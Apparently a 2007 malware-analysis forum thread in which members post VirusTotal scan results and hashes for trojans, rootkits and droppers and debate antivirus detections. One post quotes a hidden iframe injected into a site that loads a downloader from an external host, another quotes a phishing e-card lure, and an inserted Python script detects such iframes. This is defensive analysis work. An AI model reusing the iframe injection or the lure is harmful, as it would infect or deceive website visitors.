AntiVir	7.3.0.26	01.22.2007	no virus found
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.22.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	BehavesLike:Trojan.ShellObject
CAT-QuickHeal	9.00	01.22.2007	(Suspicious) - DNAScan
ClamAV	devel-20060426	01.22.2007	no virus found
DrWeb	4.33	01.22.2007	Trojan.PWS.Wmsender
eSafe	7.0.14.0	01.21.2007	no virus found
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.22.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	suspicious
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	no virus found
Ikarus	T3.1.0.27	01.22.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	no virus found
McAfee	4944	01.22.2007	New Win32.g2
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1997	01.22.2007	probably a variant of Win32/TrojanDropper.Small.NCP
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.22.2007	Suspicious file
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	VIPRE.Suspicious
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	Trojan.PWS.Wmsender
VirusBuster	4.3.19:9	01.22.2007	no virus found

Aditional Information
File size: 8704 bytes
MD5: 6573745c6dc2b364977729a3aef35272
SHA1: a30a6de1f2fcdb8ee157c66c0195a585560a76b5
packers: PECRYPT
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## urbanangel

Complete scanning result of "Web_Money.exe", received in VirusTotal at 01.23.2007, 18:43:16 (CET).

Antivirus Version Update Result 
AntiVir 7.3.0.26 01.23.2007 TR/Drop.Tiny.M.3 
Authentium 4.93.8 01.22.2007 no virus found 
Avast 4.7.936.0 01.23.2007 no virus found 
AVG 386 01.23.2007 no virus found 
BitDefender 7.2 01.23.2007 no virus found 
CAT-QuickHeal 9.00 01.22.2007 no virus found 
ClamAV devel-20060426 01.23.2007 no virus found 
DrWeb 4.33 01.23.2007 Trojan.MulDrop.5419 
eSafe 7.0.14.0 01.23.2007 Win32.Tiny.m 
eTrust-InoculateIT 23.73.120 01.23.2007 no virus found 
eTrust-Vet 30.3.3344 01.23.2007 no virus found 
Ewido 4.0 01.23.2007 no virus found 
Fortinet 2.82.0.0 01.23.2007 no virus found 
F-Prot 3.16f 01.22.2007 no virus found 
F-Prot4 4.2.1.29 01.22.2007 no virus found 
Ikarus T3.1.0.27 01.23.2007 Trojan-Clicker.Win32.NetBuie.H 
Kaspersky 4.0.2.24 01.23.2007 Trojan-Dropper.Win32.Tiny.m 
McAfee 4947 01.23.2007 no virus found 
Microsoft 1.1904 01.23.2007 no virus found 
NOD32v2 2000 01.23.2007 no virus found 
Norman 5.80.02 01.23.2007 W32/Suspicious_M.gen.dropper 
Panda 9.0.0.4 01.23.2007 Suspicious file 
Prevx1 V2 01.23.2007 no virus found 
Sophos 4.13.0 01.20.2007 no virus found 
Sunbelt 2.2.907.0 01.22.2007 no virus found 
TheHacker 6.0.3.154 01.22.2007 no virus found 
UNA 1.83 01.23.2007 no virus found 
VBA32 3.11.2 01.23.2007 Trojan.MulDrop.5038 
VirusBuster 4.3.19:9 01.23.2007 no virus found 

Aditional Information 
File size: 552972 bytes 
MD5: 34c0a2aade69879dea99a77b41b6a2e7 
SHA1: 6205dfebf30757d2bce2d954522d3b1f7a0b3970

----------


## Winsent

Complete scanning result of "Lena.scr", received in VirusTotal at 01.24.2007, 05:44:59 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.26	01.23.2007	HEUR/Crypted
Authentium	4.93.8	01.23.2007	Possibly a new variant of W32/HLLI-MewOrleans-based!Maximus
Avast	4.7.936.0	01.23.2007	Win32dpinch-AH*
AVG	386	01.23.2007	no virus found
*BitDefender	7.2	01.24.2007	Generic.PWStealer.C5C991E0
CAT-QuickHeal	9.00	01.22.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.23.2007	no virus found
*DrWeb	4.33	01.23.2007	MULDROP.PWS.Trojan
eSafe	7.0.14.0	01.23.2007	Win32.LdPinch.bkn*
eTrust-InoculateIT	23.73.121	01.24.2007	no virus found
eTrust-Vet	30.3.3346	01.23.2007	no virus found
*Ewido	4.0	01.23.2007	Trojan.LdPinch.bkn*
Fortinet	2.85.0.0	01.24.2007	no virus found
*F-Prot	3.16f	01.23.2007	Possibly a new variant of W32/HLLI-MewOrleans-based!Maximus
F-Prot4	4.2.1.29	01.23.2007	W32/HLLI-MewOrleans-based!Maximus
Ikarus	T3.1.0.27	01.24.2007	IM-Worm.Win32.Sumom.C
Kaspersky	4.0.2.24	01.24.2007	Trojan-PSW.Win32.LdPinch.bkn*
McAfee	4947	01.23.2007	no virus found
*Microsoft	1.1904	01.24.2007	Win32/Ldpinch
NOD32v2	2001	01.24.2007	probably a variant of Win32/PSW.LdPinch
Norman	5.80.02	01.23.2007	W32/Suspicious_M.gen*
Panda	9.0.0.4	01.24.2007	no virus found
Prevx1	V2	01.24.2007	no virus found
*Sophos	4.13.0	01.24.2007	Mal/Packer
Sunbelt	2.2.907.0	01.22.2007	VIPRE.Suspicious
TheHacker	6.0.3.155	01.24.2007	Trojan/PSW.LdPinch.bkn*
UNA	1.83	01.23.2007	no virus found
*VBA32	3.11.2	01.23.2007	MalwareScope.Trojan-PSW.Pinch.1
VirusBuster	4.3.19:9	01.23.2007	novirusacked/MEW*

Aditional Information
File size: 51181 bytes
MD5: 8733b36ec7c5e66544350599277d942b
SHA1: 791f43d2dd8a1f05a779b031841905a46e443724
packers: MEW
packers: MEW
packers: MEW
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Muzzle

From the thread http://virusinfo.info/showthread.php?t=11088
patched *ntoskrnl.exe*



> AhnLab-V3	2007.7.14.0	2007.07.17	no virus found
> AntiVir	7.4.0.42	2007.07.17	no virus found
> Authentium	4.93.8	2007.07.18	no virus found
> Avast	4.7.997.0	2007.07.17	no virus found
> AVG	7.5.0.476	2007.07.17	no virus found
> BitDefender	7.2	2007.07.17	no virus found
> CAT-QuickHeal	9.00	2007.07.17	no virus found
> ClamAV	devel-20070416	2007.07.17	no virus found
> DrWeb	4.33	2007.07.18	no virus found
> ...

----------



## Winsent

File index.rar received on 07.18.2007 08:11:48 (CET)
Current status:   finished 


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.7.18.0	2007.07.18	no virus found
*AntiVir	7.4.0.42	2007.07.17	EXP/VML-Fill.A*
Authentium	4.93.8	2007.07.18	no virus found
Avast	4.7.997.0	2007.07.17	no virus found
AVG	7.5.0.476	2007.07.17	no virus found
BitDefender	7.2	2007.07.17	no virus found
CAT-QuickHeal	9.00	2007.07.17	no virus found
ClamAV	devel-20070416	2007.07.18	no virus found
*DrWeb	4.33	2007.07.18	VBS.PackFor*
eSafe	7.0.15.0	2007.07.17	no virus found
eTrust-Vet	30.8.3790	2007.07.17	no virus found
Ewido	4.0	2007.07.17	no virus found
FileAdvisor	1	2007.07.18	no virus found
*Fortinet	2.91.0.0	2007.07.18	JS/WebAttacker!exploit*
F-Prot	4.3.2.48	2007.07.17	no virus found
*F-Secure	6.70.13030.0	2007.07.17	Trojan-Downloader.JS.Psyme.hu
Ikarus	T3.1.1.8	2007.07.18	Trojan-Downloader.JS.Psyme.hu
Kaspersky	4.0.2.24	2007.07.18	Trojan-Downloader.JS.Psyme.hu
McAfee	5076	2007.07.17	JS/Downloader-AUD
Microsoft	1.2704	2007.07.17	TrojanDownloader:JS/Psyme.gen*
NOD32v2	2404	2007.07.17	no virus found
Norman	5.80.02	2007.07.17	no virus found
Panda	9.0.0.4	2007.07.17	no virus found
*Sophos	4.19.0	2007.07.17	Mal/ObfJS-A*
Sunbelt	2.2.907.0	2007.07.18	no virus found
Symantec	10	2007.07.18	no virus found
*TheHacker	6.1.7.148	2007.07.16	Trojan/Downloader.vbs*
VBA32	3.12.2	2007.07.17	no virus found
*VirusBuster	4.3.23:9	2007.07.17	JS.Psyme.DD.Gen
Webwasher-Gateway	6.0.1	2007.07.17	Exploit.VML-Fill.A*
Aditional information
File size: 3905 bytes
MD5: 7d1cc59e55db21e8599ddf9f58851fbc
SHA1: 1b4de7d587522df2325bbb1178150a2d0b6ff143

----------


## icon

Continuation of the previous one:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
Current status: finished

Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.18.0	2007.07.18	no virus found
AntiVir	7.4.0.42	2007.07.18	no virus found
Authentium	4.93.8	2007.07.18	no virus found
Avast	4.7.997.0	2007.07.17	no virus found
AVG	7.5.0.476	2007.07.17	no virus found
BitDefender	7.2	2007.07.17	no virus found
CAT-QuickHeal	9.00	2007.07.17	no virus found
ClamAV	devel-20070416	2007.07.18	no virus found
*DrWeb	4.33	2007.07.18	VBS.PackFor*
eSafe	7.0.15.0	2007.07.17	no virus found
eTrust-Vet	30.8.3790	2007.07.17	no virus found
Ewido	4.0	2007.07.17	no virus found
FileAdvisor	1	2007.07.18	no virus found
Fortinet	2.91.0.0	2007.07.18	no virus found
F-Prot	4.3.2.48	2007.07.17	no virus found
F-Secure	6.70.13030.0	2007.07.17	no virus found
Ikarus	T3.1.1.8	2007.07.18	no virus found
Kaspersky	4.0.2.24	2007.07.18	no virus found
McAfee	5076	2007.07.17	no virus found
*Microsoft	1.2704	2007.07.18	TrojanDownloader:JS/Psyme.gen*
NOD32v2	2404	2007.07.17	no virus found
Norman	5.80.02	2007.07.17	no virus found
Panda	9.0.0.4	2007.07.17	no virus found
*Sophos	4.19.0	2007.07.17	Mal/ObfJS-A*
Sunbelt	2.2.907.0	2007.07.18	no virus found
Symantec	10	2007.07.18	no virus found
TheHacker	6.1.7.148	2007.07.16	no virus found
VBA32	3.12.2	2007.07.17	no virus found
*VirusBuster	4.3.23:9	2007.07.17	JS.Agent.B*
*Webwasher-Gateway	6.0.1	2007.07.18	JavaScript.CodeUnfolding.gen!High (suspicious)*
Aditional information
File size: 8413 bytes
MD5: 38ddab82dcea800e2545ef6f7fe2bc1b
SHA1: c87072b1b9ca09ae540d041d711c5353a1839c29

*Added 4 hours 2 minutes later*
From the thread

File realfoto.exe received on 07.18.2007 14:07:57 (CET)
Current status: finished

Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.18.0	2007.07.18	no virus found
AntiVir	7.4.0.42	2007.07.18	no virus found
Authentium	4.93.8	2007.07.18	no virus found
*Avast	4.7.997.0	2007.07.17	Win32:Small-GYA*
AVG	7.5.0.476	2007.07.17	no virus found
*BitDefender	7.2	2007.07.17	Dropped:Trojan.Downloader.Small.AET*
*CAT-QuickHeal	9.00	2007.07.17	(Suspicious) - DNAScan*
ClamAV	devel-20070416	2007.07.18	no virus found
DrWeb	4.33	2007.07.18	no virus found
eSafe	7.0.15.0	2007.07.17	no virus found
eTrust-Vet	30.8.3791	2007.07.18	no virus found
Ewido	4.0	2007.07.18	no virus found
FileAdvisor	1	2007.07.18	no virus found
Fortinet	2.91.0.0	2007.07.18	no virus found
F-Prot	4.3.2.48	2007.07.17	no virus found
F-Secure	6.70.13030.0	2007.07.18	no virus found
*Ikarus	T3.1.1.8	2007.07.18	Trojan-Downloader.Win32.Small.ehu*
Kaspersky	4.0.2.24	2007.07.18	no virus found
*McAfee	5076	2007.07.17	Generic Downloader*
*Microsoft	1.2704	2007.07.18	TrojanDownloader:Win32/Agent.WX*
*NOD32v2	2404	2007.07.17	probably a variant of Win32/TrojanDownloader.Small.DRU*
Norman	5.80.02	2007.07.18	no virus found
*Panda	9.0.0.4	2007.07.18	Suspicious file*
*Sophos	4.19.0	2007.07.17	Mal/Packer*
*Sunbelt	2.2.907.0	2007.07.18	VIPRE.Suspicious*
Symantec	10	2007.07.18	no virus found
TheHacker	6.1.7.148	2007.07.16	no virus found
*VBA32	3.12.2	2007.07.17	Trojan.Win32.TrojanDownloader.Small.DRU*
VirusBuster	4.3.23:9	2007.07.17	
*Webwasher-Gateway	6.0.1	2007.07.18	Packer.FSG*
Aditional information
File size: 2625 bytes
MD5: ba0b2e8dc204a4b227a3b106070b76d3
SHA1: 0794eb98b6013c452c6b0a770e7a672005d91b82
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## DVi

> Continuation of the previous one:
> zhestclub. ru
> File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
> 
> *DrWeb    4.33    2007.07.18    VBS.PackFor*


I will allow myself to doubt this detection. All that this "malicious script" does is write the following line into the document


```
<iframe src='http://bsdpng.info/error/' width=1 height=1 style='visibility: hidden;'></iframe>
```

, that is, it acts as a launcher for the classic Psyme located at the given address. The script by itself is harmless. In essence, we are looking at a classic site injection, and DrWeb has placed its signature mask on the JavaScript packer. Detections like the following are more correct (although still not valid for the VirusInfo statistics):



> *Microsoft    1.2704    2007.07.18    TrojanDownloader:JS/Psyme.gen*
> *Sophos    4.19.0    2007.07.17    Mal/ObfJS-A*
> *VirusBuster    4.3.23:9    2007.07.17    JS.Agent.B*
> *Webwasher-Gateway    6.0.1    2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)*

----------
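
A defender-side check for the injection DVi describes, added here as an example and not part of the original thread: it scans a page for iframes that are hidden (1x1 size or CSS-hidden) and point to a foreign host, both in the markup and inside script string literals. The function names, the `.example` hosts and the sample page are constructed; a packed script has to be unpacked first, since the iframe string only appears in its output.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDING_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
IFRAME_LITERAL = re.compile(r"<iframe\b[^>]*>", re.I)
TINY = re.compile(r"\s*([0-2])\s*(px)?\s*$", re.I)  # 0, 1, 2 or "1px"; not "100%"


class IframeAudit(HTMLParser):
    """Collects iframes hidden from the visitor, in markup or in script strings."""

    def __init__(self, site_host, origin="markup"):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host.lower()
        self.origin = origin
        self.findings = []
        self._script = None  # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
        elif tag == "iframe":
            self._check({name: value or "" for name, value in attrs})

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self.flush_script()

    def flush_script(self):
        """Re-parse every <iframe ...> literal found in the buffered script text."""
        text, self._script = "".join(self._script or []), None
        for literal in IFRAME_LITERAL.findall(text):
            sub = IframeAudit(self.site_host, origin="script string")
            sub.feed(literal.replace("\\", ""))  # undo \" escaping in JS strings
            sub.close()
            self.findings.extend(sub.findings)

    def _check(self, attrs):
        reasons = []
        if TINY.match(attrs.get("width", "")) and TINY.match(attrs.get("height", "")):
            reasons.append("tiny")
        if HIDING_STYLE.search(attrs.get("style", "")):
            reasons.append("css-hidden")
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        foreign = (bool(host) and host != self.site_host
                   and not host.endswith("." + self.site_host))
        if reasons:
            self.findings.append({"src": src, "host": host, "origin": self.origin,
                                  "reasons": reasons, "foreign": foreign})


def hidden_foreign_iframes(html, site_host):
    """Return hidden iframes whose src points outside site_host and its subdomains."""
    audit = IframeAudit(site_host)
    audit.feed(html)
    audit.close()
    audit.flush_script()  # covers a <script> left unclosed at end of input
    return [f for f in audit.findings if f["foreign"]]


# Constructed sample page: a visible embed, a same-site 1x1 frame, and two
# injected frames (one in markup, one written by a script).
SAMPLE_PAGE = """<html><body>
<h1>Club news</h1>
<iframe src="http://video.example/embed/42" width="560" height="315"></iframe>
<iframe src="/banner.html" width="1" height="1"></iframe>
<iframe src='http://injected.example/error/' width=1 height=1 style='visibility: hidden;'></iframe>
<script>document.write("<iframe src='http://injected2.example/in/' width=0 height=0></iframe>");</script>
</body></html>"""

if __name__ == "__main__":
    for hit in hidden_foreign_iframes(SAMPLE_PAGE, "club.example"):
        print(hit["origin"], hit["host"], ",".join(hit["reasons"]))
```

----------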


## XL

> File ecard.exe received on 07.19.2007 21:15:51 (CET)
> Current status:    finished 
> 
> Print results Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.7.20.0	2007.07.19	no virus found
> *AntiVir	7.4.0.44	2007.07.19	WORM/Zhelatin.Gen*
> Authentium	4.93.8	2007.07.19	no virus found
> *Avast	4.7.997.0	2007.07.19	Win32:Tibs-BBG*
> AVG	7.5.0.476	2007.07.19	no virus found
> ...


KIS 7, latest build, does not detect it either in maximum heuristics mode, although just a couple of days ago files from similar emails were caught as *trojan.generic*.
And 5-10 emails of this kind arrive per day:



> Hi. School mate has sent you a greeting ecard.
> See your card as often as you wish during the next 15 days.
> 
> SEEING YOUR CARD
> 
> If your email software creates links to Web pages, click on your card's direct www address below while you are connected to the Internet:
> 
> http://72.230.33.160/*****************
> 
> ...

----------


## Helgin

In defense of Microsoft -)

Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.20.0	2007.07.19	no virus found
*AntiVir	7.4.0.44	2007.07.19	WORM/Zhelatin.Gen*
Authentium	4.93.8	2007.07.19	no virus found
*Avast	4.7.997.0	2007.07.19	Win32:Tibs-BBG*
AVG	7.5.0.476	2007.07.18	no virus found
*BitDefender	7.2	2007.07.19	Trojan.Peed.IAM*
CAT-QuickHeal	9.00	2007.07.19	(Suspicious) - DNAScan
ClamAV	devel-20070416	2007.07.19	no virus found
DrWeb	4.33	2007.07.19	no virus found
*eSafe	7.0.15.0	2007.07.17	Suspicious Trojan/Worm*
*eTrust-Vet	30.8.3794	2007.07.19	Win32/Sintun*
Ewido	4.0	2007.07.19	no virus found
FileAdvisor	1	2007.07.19	no virus found
Fortinet	2.91.0.0	2007.07.19	no virus found
F-Prot	4.3.2.48	2007.07.19	no virus found
F-Secure	6.70.13030.0	2007.07.19	no virus found
Ikarus	T3.1.1.8	2007.07.19	no virus found
Kaspersky	4.0.2.24	2007.07.19	no virus found
McAfee	5078	2007.07.19	no virus found
*Microsoft	1.2704	2007.07.19	TrojanDropper:Win32/Tibs.O*
NOD32v2	2407	2007.07.19	no virus found
Norman	5.80.02	2007.07.19	no virus found
Panda	9.0.0.4	2007.07.19	no virus found
*Sophos	4.19.0	2007.07.17	Mal/Dorf-A*
Sunbelt	2.2.907.0	2007.07.19	no virus found
*Symantec	10	2007.07.19	Trojan.Packed.13*
TheHacker	6.1.7.149	2007.07.18	no virus found
VBA32	3.12.2.1	2007.07.19	no virus found
VirusBuster	4.3.26:9	2007.07.19	no virus found
*Webwasher-Gateway	6.0.1	2007.07.19	Worm.Zhelatin.Gen*

----------


## mayas

caught it by hand in \system32\drivers

File firelm01.sys received on 07.21.2007 11:37:32 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
AntiVir	7.4.0.44	2007.07.20	no virus found
Authentium	4.93.8	2007.07.20	no virus found
Avast	4.7.997.0	2007.07.20	no virus found
AVG	7.5.0.476	2007.07.20	no virus found
BitDefender	7.2	2007.07.21	no virus found
CAT-QuickHeal	9.00	2007.07.20	no virus found
ClamAV	devel-20070416	2007.07.21	no virus found
DrWeb	4.33	2007.07.21	no virus found
eSafe	7.0.15.0	2007.07.19	no virus found
eTrust-Vet	30.8.3797	2007.07.20	no virus found
Ewido	4.0	2007.07.21	no virus found
FileAdvisor	1	2007.07.21	no virus found
Fortinet	2.91.0.0	2007.07.21	no virus found
F-Prot	4.3.2.48	2007.07.20	no virus found
F-Secure	6.70.13030.0	2007.07.20	no virus found
Ikarus	T3.1.1.8	2007.07.21	no virus found
*Kaspersky	4.0.2.24	2007.07.21	Backdoor.Win32.Hackdoor.g*
McAfee	5079	2007.07.20	no virus found
Microsoft	1.2704	2007.07.21	no virus found
NOD32v2	2410	2007.07.20	no virus found
Norman	5.80.02	2007.07.20	no virus found
Panda	9.0.0.4	2007.07.20	no virus found
Sophos	4.19.0	2007.07.17	no virus found
Sunbelt	2.2.907.0	2007.07.21	no virus found
Symantec	10	2007.07.21	no virus found
TheHacker	6.1.7.150	2007.07.21	no virus found
VBA32	3.12.2.1	2007.07.21	no virus found
VirusBuster	4.3.26:9	2007.07.20	no virus found
Webwasher-Gateway	6.0.1	2007.07.21	no virus found

Additional information
File size: 32855 bytes
MD5: 98638f2f168f5856d11083c1f5843ba2
SHA1: 9cc547244ffaf8c4a1d43abdd2a742f47c8295cd

add:


> my post http://virusinfo.info/showpost.php?p...&postcount=227
> an error by a Kaspersky Lab virus analyst (I sent it to the virus lab and got a reply that new malicious software had been found), but this is a firewall component

----------


## Макcим

File avz00001.dta received on 07.21.2007 13:12:23 (CET)


> AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
> AntiVir	7.4.0.44	2007.07.20	no virus found
> Authentium	4.93.8	2007.07.20	no virus found
> Avast	4.7.997.0	2007.07.20	no virus found
> AVG	7.5.0.476	2007.07.20	no virus found
> *BitDefender	7.2	2007.07.21	Trojan.Rootkit.Loader.A*
> CAT-QuickHeal	9.00	2007.07.20	no virus found
> ClamAV	devel-20070416	2007.07.21	no virus found
> DrWeb	4.33	2007.07.21	no virus found
> ...

----------


## Muffler

File bcqr00001.dat received on 07.21.2007 21:25:06 (CET)



> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
> AntiVir	7.4.0.44	2007.07.21	no virus found
> Authentium	4.93.8	2007.07.20	no virus found
> Avast	4.7.997.0	2007.07.20	no virus found
> AVG	7.5.0.476	2007.07.21	no virus found
> BitDefender	7.2	2007.07.21	no virus found
> CAT-QuickHeal	9.00	2007.07.20	no virus found
> ClamAV	devel-20070416	2007.07.21	no virus found
> ...


Additional information
File size: 61114 bytes
MD5: 8c1d95da9e9085b8c2b13556b3dd95d3
SHA1: 28a2dce0dfd8355c5f011c6c0ab03e2df1bb896e
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.

*Added 3 hours 21 minutes later*
File avz00002.dta received on 07.22.2007 00:45:31 (CET)




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
> *AntiVir	7.4.0.44	2007.07.21	TR/Rootkit.Gen*
> Authentium	4.93.8	2007.07.20	no virus found
> *Avast	4.7.997.0	2007.07.20	Win32:Trojan-gen. {Other}*
> AVG	7.5.0.476	2007.07.21	no virus found
> *BitDefender	7.2	2007.07.21	Backdoor.Rustock.B*
> CAT-QuickHeal	9.00	2007.07.20	no virus found
> ClamAV	devel-20070416	2007.07.22	no virus found
> ...


Additional information
File size: 80488 bytes
MD5: 95a506f62ce73818fa6e27d1c052b711
SHA1: 6d880bc775e46e0a26859003dcfb44b26e076276
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.

----------


## Winsent

File 1.exe received on 07.22.2007 10:10:16 (CET)

Antivirus  	Version  	Last Update  	Result
AhnLab-V3	2007.7.21.0	2007.07.20	no virus found
*AntiVir	7.4.0.44	2007.07.21	HEUR/Malware*
Authentium	4.93.8	2007.07.20	no virus found
*Avast	4.7.997.0	2007.07.22	Win32elf-CAT*
AVG	7.5.0.476	2007.07.21	no virus found
BitDefender	7.2	2007.07.22	no virus found
*CAT-QuickHeal	9.00	2007.07.20	(Suspicious) - DNAScan*
ClamAV	devel-20070416	2007.07.22	no virus found
DrWeb	4.33	2007.07.21	no virus found
eSafe	7.0.15.0	2007.07.19	no virus found
eTrust-Vet	30.8.3797	2007.07.20	no virus found
Ewido	4.0	2007.07.21	no virus found
FileAdvisor	1	2007.07.22	no virus found
Fortinet	2.91.0.0	2007.07.22	no virus found
F-Prot	4.3.2.48	2007.07.20	no virus found
F-Secure	6.70.13030.0	2007.07.21	no virus found
*Ikarus	T3.1.1.8	2007.07.22	Trojan-PWS.Win32.Kapod*
Kaspersky	4.0.2.24	2007.07.22	no virus found
McAfee	5079	2007.07.20	no virus found
Microsoft	1.2704	2007.07.22	no virus found
NOD32v2	2411	2007.07.21	no virus found
Norman	5.80.02	2007.07.20	no virus found
*Panda	9.0.0.4	2007.07.22	Suspicious file*
Sophos	4.19.0	2007.07.17	no virus found
*Sunbelt	2.2.907.0	2007.07.21	VIPRE.Suspicious*
Symantec	10	2007.07.22	no virus found
TheHacker	6.1.7.150	2007.07.21	no virus found
VBA32	3.12.2.1	2007.07.21	no virus found
VirusBuster	4.3.26:9	2007.07.21	no virus found
*Webwasher-Gateway	6.0.1	2007.07.22	Heuristic.Malware*


Additional information
File size: 264192 bytes
MD5: 849f0a1fcbfc7752368131947228790d
SHA1: 33d8313e504f36cbd8a45ea1de5a92d50b95c37f
packers: ASProtect
packers: PE_Patch, Aspack
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## kvit

Antivirus Version Last Update Result 
AhnLab-V3 2007.7.25.0 2007.07.24 no virus found 
AntiVir 7.4.0.44 2007.07.24 no virus found 
Authentium 4.93.8 2007.07.25 no virus found 
*Avast 4.7.997.0 2007.07.25 Win32:Trojan-gen. {Other} 
AVG 7.5.0.476 2007.07.25 Downloader.Zlob.HN 
BitDefender 7.2 2007.07.25 Trojan.Downloader.Zlob.AAEE* 
CAT-QuickHeal 9.00 2007.07.24 no virus found 
ClamAV devel-20070416 2007.07.25 no virus found 
DrWeb 4.33 2007.07.25 no virus found 
eSafe 7.0.15.0 2007.07.24 no virus found 
eTrust-Vet 31.1.5003 2007.07.24 no virus found 
Ewido 4.0 2007.07.24 no virus found 
FileAdvisor 1 2007.07.25 no virus found 
Fortinet 2.91.0.0 2007.07.25 no virus found 
F-Prot 4.3.2.48 2007.07.25 no virus found 
*F-Secure 6.70.13030.0 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn* 
Ikarus T3.1.1.8 2007.07.24 no virus found 
*Kaspersky 4.0.2.24 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn* 
McAfee 5081 2007.07.24 no virus found 
*Microsoft 1.2704 2007.07.25 TrojanDownloader:Win32/Zlob* 
NOD32v2 2418 2007.07.25 no virus found 
*Norman 5.80.02 2007.07.24 DNSChanger.gen10* 
Panda 9.0.0.4 2007.07.24 no virus found 
*Sophos 4.19.0 2007.07.17 Mal/Zlob-A* 
Sunbelt 2.2.907.0 2007.07.25 no virus found 
Symantec 10 2007.07.25 no virus found 
TheHacker 6.1.7.152 2007.07.23 no virus found 
VBA32 3.12.2.1 2007.07.24 no virus found 
VirusBuster 4.3.26:9 2007.07.24 no virus found 
Webwasher-Gateway 6.0.1 2007.07.25 no virus found 

*Added 2 minutes later*
+ the same from the Kaspersky website

Проверенный файл:   setup.exe - Инфицирован 

setup.exe/stream/Script - в порядке
setup.exe/stream/data0001 - в порядке
setup.exe/stream/data0002 - в порядке
setup.exe/stream/data0003 - в порядке
setup.exe/stream/data0004 - в порядке
setup.exe/stream/data0005 - в порядке
*setup.exe/stream/data0006 - инфицирован Trojan-Downloader.Win32.Zlob.bxn* 
setup.exe/stream/data0007 - в порядке
setup.exe/stream/data0008 - в порядке

----------


## Muffler

File svc.exe received on 07.26.2007 06:25:17 (CET)




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.26.0	2007.07.25	no virus found
> *AntiVir	7.4.0.50	2007.07.25	HEUR/Crypted*
> Authentium	4.93.8	2007.07.25	no virus found
> Avast	4.7.997.0	2007.07.26	no virus found
> AVG	7.5.0.476	2007.07.25	no virus found
> BitDefender	7.2	2007.07.26	no virus found
> *CAT-QuickHeal	9.00	2007.07.25	(Suspicious) - DNAScan*
> ClamAV	0.91	2007.07.26	no virus found
> ...


Additional information
File size: 4538 bytes
MD5: a5da3a9c3b0e2b5034b3ec49cbb3a60f
SHA1: 2dca577caf641a2b4e3972902b65b7b1342fab34

----------


## Kuzz

http://virusinfo.info/showthread.php?t=11350




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.27.0	2007.07.26	-
> AntiVir	7.4.0.50	2007.07.26	-
> Authentium	4.93.8	2007.07.25	-
> Avast	4.7.997.0	2007.07.26	-
> AVG	7.5.0.476	2007.07.26	PSW.Generic4.ZKV
> BitDefender	7.2	2007.07.26	MemScan:Trojan.Spy.Nuklus.D
> CAT-QuickHeal	9.00	2007.07.25	-
> ClamAV	0.91	2007.07.26	-
> ...





> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.27.0	2007.07.26	-
> AntiVir	7.4.0.50	2007.07.26	BDS/Afcore.cb.2.B
> Authentium	4.93.8	2007.07.25	-
> Avast	4.7.997.0	2007.07.26	-
> AVG	7.5.0.476	2007.07.26	-
> BitDefender	7.2	2007.07.26	-
> CAT-QuickHeal	9.00	2007.07.25	-
> ClamAV	0.91	2007.07.26	-
> ...

----------


## Muffler

File _________________________________ received on 07.26.2007 16:57:15




> Antivirus  	Version  	Last Update  	Result
> AhnLab-V3	2007.7.27.0	2007.07.26	-
> AntiVir	7.4.0.50	2007.07.26	-
> Authentium	4.93.8	2007.07.25	-
> Avast	4.7.997.0	2007.07.26	-
> AVG	7.5.0.476	2007.07.26	-
> BitDefender	7.2	2007.07.26	-
> CAT-QuickHeal	9.00	2007.07.25	-
> ClamAV	0.91	2007.07.26	-
> ...


Additional information
File size: 21071 bytes
MD5: 03bfb34583fcd2b913f4bb9be182bc3f
SHA1: a47e0e7bc5ee907faba6a69f4a1cc65f76a8f06d

----------


## V_Bond

